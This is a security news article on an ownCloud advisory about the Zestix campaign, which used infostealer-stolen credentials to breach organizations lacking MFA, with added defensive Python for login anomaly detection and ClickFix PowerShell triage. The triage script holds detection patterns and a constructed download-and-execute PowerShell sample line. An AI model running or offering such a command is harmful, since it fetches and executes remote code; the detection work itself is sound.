
ownCloud Warns of Massive Credential Theft: Enable MFA Immediately

ownCloud has issued an urgent security advisory following a Hudson Rock report revealing that dozens of organizations were compromised through infostealer-harvested credentials. The threat actor Zestix is selling access to major enterprises that failed to enable MFA on their cloud storage platforms.

Evan Mael
50+ international organizations compromised through credential theft, including Deloitte, KPMG, Samsung, and the U.S. CDC

The most sophisticated cyberattacks don't require sophisticated exploits. A threat actor operating under the alias Zestix has demonstrated this principle by compromising dozens of major organizations using nothing more than stolen usernames and passwords - credentials that had been sitting in dark web databases for months or even years, waiting for someone to use them.

The common thread among all victims: none had enabled multi-factor authentication on their cloud file-sharing platforms.

The Credential Supply Chain

The attack chain exploiting these organizations is remarkably straightforward. It begins not with the target organizations themselves, but with individual employees whose personal or work computers become infected with infostealer malware.

Infostealers like RedLine, Lumma, and Vidar operate silently in the background, harvesting saved credentials and session cookies from web browsers, messaging applications, and password manager data. These malware families spread through malvertising campaigns, fake software downloads, and ClickFix attacks that trick users into pasting and running malicious PowerShell commands themselves.

Once harvested, stolen credentials flow into massive aggregation databases on the dark web. Some credentials had been present in these databases for years, waiting for an actor with the knowledge and motivation to exploit them. Zestix specifically targeted enterprise URLs for ShareFile, Nextcloud, and ownCloud - platforms where a single compromised account can expose terabytes of sensitive business data.

Scope of the Breach

Hudson Rock's investigation revealed compromises across virtually every sector where confidential data flows between organizations.

Intecro Robotics, a Turkish defense contractor, lost 11.5 GB of military blueprints including UAV designs and fighter jet schematics. Engineering firm Pickett & Associates saw 139 GB of LiDAR data and U.S. infrastructure plans exfiltrated. Brazilian healthcare provider Maida Health suffered the exposure of 2.3 TB of patient medical records.

The victim list extends to household names. Deloitte and KPMG face potential exposure of client audit files. Samsung, Honeywell, and Walmart all had corporate data accessed. Even the U.S. Centers for Disease Control saw confidential government documents compromised.

Perhaps most concerning, Indonesian satellite operator PSN lost 92 GB of data related to Boeing and SpaceX satellite operations.

2.3 TB of medical records exposed from a single Brazilian healthcare provider, demonstrating the data volumes at risk from credential-based attacks

The Credential Hygiene Failure

The Hudson Rock report highlights a critical finding that should alarm every IT administrator: how long stolen credentials remain usable. While some credentials came from recently infected machines, others had been sitting in attacker databases for years. Organizations had multiple opportunities to rotate passwords, invalidate sessions, and implement MFA - and failed to do so.

The compromised organizations share common security failures. Password rotation policies were either nonexistent or unenforced, with some credentials unchanged for years. Session management was neglected, leaving authentication tokens active indefinitely. Most critically, multi-factor authentication - the single control that would have prevented these breaches - was never enabled.

Threat Actor Profile

Zestix, also known as Sentap, operates as an Initial Access Broker - a specialized cybercriminal who gains access to organizations and sells that access to other threat actors. According to research from DarkSignal and Hudson Rock, the actor is believed to be of Iranian origin and has been active since at least 2021.

The actor has affiliations with the Funksec cartel, a ransomware operation notable for incorporating generative AI into their attack tooling. This connection suggests that organizations breached through Zestix's credential exploitation may face ransomware attacks as a secondary monetization of the initial access.

Defensive Measures

The solution to credential-based attacks is straightforward but requires organizational commitment. MFA must be enabled on every cloud file-sharing platform without exception; this single control would have blocked the password-replay logins behind every breach in the Zestix campaign. One caveat a practitioner should keep in mind: infostealers also harvest browser session cookies, and a replayed cookie needs no second factor, so MFA has to be paired with short session lifetimes and the ability to revoke active sessions.

Password rotation should be enforced through policy, not left to user discretion. Session tokens need defined lifetimes with automatic invalidation. Access logs require active monitoring for anomalous patterns: logins from unusual geolocations, impossible travel (two logins by the same account from locations too far apart for the time between them), or access outside normal business hours.
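The log-monitoring advice above is easy to state and easy to leave unimplemented. The following is an added example, not code from ownCloud, Nextcloud or the Hudson Rock report, showing the two checks a practitioner would wire up first: impossible travel (distance between consecutive logins divided by the time between them) and off-hours access. The log line format, the GeoIP table and the sample logins are all constructed for illustration; a real deployment would read the platform's audit log and call a GeoIP database instead of the inline dictionary.

```python
"""Flag impossible-travel and off-hours logins in file-sharing access logs.

Added example. The log format, GEOIP table and SAMPLE_LOG are constructed
for illustration; they are not from ownCloud, Nextcloud or Hudson Rock.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed stand-in for a GeoIP lookup: source IP -> (lat, lon, label).
GEOIP = {
    "203.0.113.10": (40.7128, -74.0060, "New York, US"),
    "198.51.100.7": (35.6895, 139.6917, "Tokyo, JP"),
    "192.0.2.55": (40.7306, -73.9352, "Brooklyn, US"),
}

MAX_SPEED_KMH = 1000.0        # faster than this between two logins is "impossible"
BUSINESS_HOURS = range(7, 20)  # 07:00-19:59 UTC counts as normal working hours


@dataclass
class Login:
    ts: datetime
    user: str
    ip: str


def parse_line(line: str) -> Login | None:
    """Parse '<ISO8601> user=<name> ip=<addr> event=login_success'; skip anything else."""
    parts = line.split()
    if len(parts) != 4 or parts[3] != "event=login_success":
        return None
    ts = datetime.fromisoformat(parts[0].replace("Z", "+00:00"))
    return Login(ts, parts[1].removeprefix("user="), parts[2].removeprefix("ip="))


def haversine_km(a: tuple, b: tuple) -> float:
    """Great-circle distance in km between two (lat, lon, ...) tuples."""
    lat1, lon1 = map(radians, a[:2])
    lat2, lon2 = map(radians, b[:2])
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def analyse(lines: list[str]) -> list[tuple[str, str, str]]:
    """Return (user, reason, detail) alerts for off-hours and impossible-travel logins."""
    alerts = []
    last: dict[str, Login] = {}  # most recent successful login per user
    for line in lines:
        login = parse_line(line)
        if login is None:
            continue
        if login.ts.hour not in BUSINESS_HOURS:
            alerts.append((login.user, "off_hours", f"{login.ts.isoformat()} from {login.ip}"))
        prev = last.get(login.user)
        if prev is not None and prev.ip != login.ip:
            here, there = GEOIP.get(prev.ip), GEOIP.get(login.ip)
            if here and there:
                km = haversine_km(here, there)
                hours = (login.ts - prev.ts).total_seconds() / 3600
                speed = km / hours if hours > 0 else float("inf")
                if speed > MAX_SPEED_KMH:
                    alerts.append((login.user, "impossible_travel",
                                   f"{here[2]} -> {there[2]}: {km:.0f} km in {hours:.2f} h"))
        last[login.user] = login
    return alerts


# Constructed sample: alice "flies" New York -> Tokyo in 28 minutes; bob logs in
# at 02:15 UTC; carol's failed login is ignored by the parser.
SAMPLE_LOG = [
    "2026-01-06T09:12:04Z user=alice ip=203.0.113.10 event=login_success",
    "2026-01-06T09:40:31Z user=alice ip=198.51.100.7 event=login_success",
    "2026-01-06T11:05:00Z user=bob ip=203.0.113.10 event=login_success",
    "2026-01-06T12:30:00Z user=bob ip=192.0.2.55 event=login_success",
    "2026-01-07T02:15:44Z user=bob ip=203.0.113.10 event=login_success",
    "2026-01-07T02:16:00Z user=carol ip=203.0.113.10 event=login_failure",
]

if __name__ == "__main__":
    for user, reason, detail in analyse(SAMPLE_LOG):
        print(f"{reason:18} {user:8} {detail}")
```

The speed threshold, business-hours window and the one-login lookback are deliberately simple; the point is that both checks need only the fields a file-sharing platform's audit log already records (timestamp, account, source IP), so there is no reason for them to be missing.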

For preventing the initial infostealer infections that feed the credential pipeline, organizations should deploy endpoint detection and response solutions, restrict PowerShell execution on user workstations, and train employees to recognize ClickFix attacks that present fake system errors demanding command-line actions.
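ClickFix lures end with the victim pasting a PowerShell one-liner into the Run dialog, so the process-creation event on the endpoint is where the infection can still be caught. The following is an added example, not code from ownCloud or Hudson Rock, of the triage logic a detection engineer would run over such events: it scores the command line against generic PowerShell abuse indicators, decodes any -EncodedCommand payload (base64 of UTF-16LE, which is how PowerShell encodes it) so the hidden download-and-execute shows up, and treats explorer.exe as parent (the Run dialog) as an extra signal. The sample events and the payload are constructed; the indicator list is a generic starting point, not a vendor signature.

```python
"""Triage process-creation events for ClickFix-style PowerShell abuse.

Added example. SAMPLE_EVENTS and PAYLOAD are constructed; the SUSPICIOUS
patterns are generic indicators, not signatures from any vendor or report.
"""
import base64
import re

# (regex, label) pairs; matched case-insensitively against the command line
# plus any decoded -EncodedCommand payload.
SUSPICIOUS = [
    (r"-(?:e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
    (r"\b(?:iex|invoke-expression)\b", "invoke-expression"),
    (r"\b(?:iwr|invoke-webrequest|curl|wget)\b", "web download"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\bmshta\b", "mshta"),
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmdline: str):
    """Return (matched indicator labels, decoded payload or None)."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (" " + decoded if decoded else "")
    hits = [label for pattern, label in SUSPICIOUS if re.search(pattern, text, re.I)]
    return hits, decoded


def triage(event: dict):
    """Return (suspicious, reasons, decoded_payload) for one process-creation event."""
    hits, decoded = score(event["cmdline"])
    # A PowerShell child of explorer.exe with any indicator is the Run-dialog
    # (Win+R) pattern that ClickFix lures rely on.
    if hits and event["parent"].lower() == "explorer.exe":
        hits = hits + ["launched from explorer.exe (Run dialog)"]
    return len(hits) >= 2, hits, decoded


# Constructed sample: a ClickFix-style lure, a benign interactive command that
# also came from explorer.exe, and a build script launched from an editor.
PAYLOAD = "iwr http://203.0.113.5/fix.ps1 | iex"  # constructed, not a real URL
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"},
    {"parent": "explorer.exe", "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "code.exe", "cmdline": "powershell.exe -File build.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        suspicious, reasons, decoded = triage(event)
        print("SUSPECT " if suspicious else "ok      ", event["cmdline"][:60])
        for r in reasons:
            print("    -", r)
        if decoded:
            print("    decoded:", decoded)
```

Requiring two indicators keeps a lone `-w hidden` in a legitimate scheduled task from paging anyone, while the decode step is what turns an opaque base64 blob into the `iwr ... | iex` that analysts actually need to see; without it the encoded lure matches only one pattern.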

The Broader Implications

This campaign represents the industrialization of credential-based attacks. Zestix didn't need to discover vulnerabilities, develop exploits, or maintain sophisticated attack infrastructure. The threat actor simply purchased credentials that careless security practices had already exposed, then walked through the front door.

The message from ownCloud is unambiguous: MFA is no longer optional. It is the final defensive barrier when credentials are compromised, something that, statistically, will happen to most organizations sooner or later. The only question is whether that barrier will be in place when attackers come calling.

For managed service providers and enterprise administrators, the imperative is clear. Every file-sharing instance under your control should have MFA enforced today, not scheduled for a future security initiative.

Incident Summary

Type: Data Breach
Severity: High
Industry: Enterprise
Threat Actor: Zestix (Sentap)
Target: Cloud file-sharing platforms
Published: Jan 7, 2026
